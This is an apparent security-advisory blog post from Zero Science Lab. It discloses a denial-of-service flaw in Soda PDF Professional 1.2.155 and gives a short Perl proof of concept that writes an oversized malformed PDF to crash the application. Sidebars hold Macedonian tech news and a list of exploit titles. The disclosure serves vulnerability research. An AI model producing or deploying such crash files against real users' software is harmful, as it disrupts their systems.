Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)

HOME
Internal
Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)

Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)

Soda PDF Pro suffers from a restriction of service (RoS) vulnerability when handling PDF or WWF file formats which can be exploited by malicious people to cause a denial of service scenario.

——–perl code——-

use strict;

my $file = “Midnight_in_Paris.pdf”; # or .wwf
my $tovar = “\x25\x50\x44\x46\x0A”.”\x41″ x 300000;
print “\n\n[*] Creating $file file…\n”;
open ZSL, “>./$file” || die “\nCan’t open $file: $!”;
print ZSL $tovar;
print “\n[.] File successfully mounted!\n\n”;
close ZSL;

——–/perl code——-

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php

2011: 11/10
POSTED BY: zeroscience
CATEGORY: Internal
Comments Off

Comment are closed.

11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability

Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability

Zero Science Lab

http://www.zeroscience.mk

RSS FEED

Categories / Категории

Bookz (5)
Games (1)
Graphics (18)
Internal (147)
Tools (7)

Friends / Пријатели

Calendar / Календар

November 2011
M	T	W	T	F	S	S
« Oct		Dec »
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

IT.com.mk

Twitter имплементира „Не ме следи“ опција 17/05/2012
Twitter се приклучи на иницијативата на Mozilla да се воведе „Не ме следи“ опција која ќе им овозможи на корисниците да му кажат на сервисот за микро-блогирање да не им ги собира личните информации. Оваа опција е достапна веќе година дена на Firefox прелистувачот, и, иако е лесна за користење и препорачлива за секој кој... […]
IT.com.mk
Дигитални македонски телевизии од јуни 2013 година 17/05/2012
Агенцијата за електронски комуникација ја избра компанијата „Веселин“ да го дигитализира аналогниот сигнал на националните и регионалните телевизии. Директорот на АЕК, Роберт Ордановски, вели дека „Веселин“ за две недели ќе добие лиценца за национален оператор за дигитална телевизија и ќе биде обврзан да им обезбеди на четирите национални и локалните телевиз […]
IT.com.mk
Дали Македонија е навистина меѓу четирите држави со најбрз развој на ИТ услуги во светот? 17/05/2012
ИТ министерот Иво Ивановски вели дека на Светскиот самит за информатичко општество во Женева, Македонија е оценета од страна на Обединетите Нации како една од најдобрите земји во светот кога станува збор за развој на широкопојасен интернет, високиот степен на застапеност и новата генерација на мобилни мрежи. Оваа е голема пофалба за „информатичкото општество […]
Виктор Дано
Менаџирајте Facebook фан страни преку iPhone 17/05/2012
Facebook претстави нова iOS апликација Pages Manager која ќе им овозможи на админстраторите да ги менаџираат своите фан страни. Апликацијата вклучува пишување на статусти, прегледување на активноста на фановите, пристап до алатките за аналитика, или на кратко, целосен пристап до Admin Panel. Бесплатниот Pages Manager е достапeн во App Store во САД и Нов Зела […]
IT.com.mk
Google и оддаде признание на македонската заедница на корисници на слободен софтвер 17/05/2012
Google на својот блог наменет за слободен софтвер проекти објави пост за македонската слободен софтвер заедница. Ок, постот не е напишан од Google, туку од Тамара Атанасоска, член на оваа заедница и студент на Google Summer of Code. Но, сепак самата објава на официјалниот блог е одлично признание за работата на оваа заедница. Тамара во... […]
IT.com.mk
Google го претстави Knowledge Graph, најголемата новина во пребарувањето до сега 16/05/2012
Google полека, но сигурно започнува да го воведување долгоочекуваното семантичко пребарување што комплетно ќе го промени начинот на како наоѓаме информации на интернет. Новината, сега позната како Knowledge Graph, треба да ви ги донесе резултатите кои ги посакувате без да се губите по веб страни и линкови. Сега со Кnowledge Graph кога ќе пребарувате термин.. […]
Виктор Дано
Новиот iPhone ќе има поголем екран 16/05/2012
Новиот iPhone ќе има 4-инчен екран, малку поголем од 3,5 инчниот кој го видовме на сите пет генерации на паметниот тeлефон од Apple, дознава Wall Street Journal повикувајќи се на анонимни извори блиски до компанијата кои велат дека Apple нарачал поголеми екрани од своите азиски партнери. Информацијата подоцна беше потврдена и од Reuters. Но, освен... […]
IT.com.mk
Новиот iPad пристигна во Дуна Компјутери 16/05/2012
Новиот iPad сега е достапен во Дуна Компјутери, кои се официјалниот партнер на Apple продукти во Македонија. Таблетот беше достапен на македонскиот пазар уште од мај, но oд неофицијални претпродавачи. Најголемата новина во новиот iPаd, кој е трета верзија на популарниот компјутер, е Retina дисплејот со висока резолуција од 2048 x 1536 пиксели. Работи на... […]
Виктор Дано
E-потсетникот на МИОA ќе ве потсетува за досадните административни обврски 16/05/2012
ИТ министерството го претстави Е-потсетник, нов веб сервис кој преку SMS порака или имејл ќе ги потсетува граѓаните за нивните административни обврски како пријавување на новороденче, лиценца за категоризација на хотели, издавање на работни дозволи за странци, потсетување за дозвола за поставени реклами на државни патишта и други досадни административни рабо […]
IT.com.mk
„Мое осигурување, мој доктор“ е нов веб сервис за проверка на здраствено осигурување 16/05/2012
Основната цел на веб сервисот „Мое осигурување, мој доктор“ е скратување на времето, намалувањее на гужвите и полесно остварување на правата како на осигурениците така и на избраните лекари, вели Фондот за здраствено осигурување на Македонија. „За да се користат овие услуги потребно е да се има само компјутер интернет и мало познавање за истите.“... […]
IT.com.mk

Exploit Database

[dos] - Trigerring Java Code from a SVG Image 16/05/2012
Trigerring Java Code from a SVG Image […]
[webapps] - Artiphp CMS 5.5.0 Database Backup Disclosure Exploit 16/05/2012
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit […]
[webapps] - OpenKM Document Management System 5.1.7 Command Execution 16/05/2012
OpenKM Document Management System 5.1.7 Command Execution […]
[webapps] - Axous 1.1.1 Multiple Vulnerabilities (CSRF - Persistent XSS) 16/05/2012
Axous 1.1.1 Multiple Vulnerabilities (CSRF - Persistent XSS) […]
[webapps] - Serendipity 1.6 Backend XSS And SQLi Vulnerability 15/05/2012
Serendipity 1.6 Backend XSS And SQLi Vulnerability […]
[webapps] - Liferay Portal 6.1 - 6.0.x Privilege Escalation 15/05/2012
Liferay Portal 6.1 - 6.0.x Privilege Escalation […]
[dos] - Multimedia Builder 4.9.8 Malicious mef Crash 15/05/2012
Multimedia Builder 4.9.8 Malicious mef Crash […]
[webapps] - b2ePMS 1.0 Authentication Bypass Vulnerability 15/05/2012
b2ePMS 1.0 Authentication Bypass Vulnerability […]
[dos] - FlexNet License Server Manager Stack Overflow In lmgrd 14/05/2012
FlexNet License Server Manager Stack Overflow In lmgrd […]
[dos] - Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities 14/05/2012
Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities […]

Rete Mirabilia

Macedonian information security research and development laboratory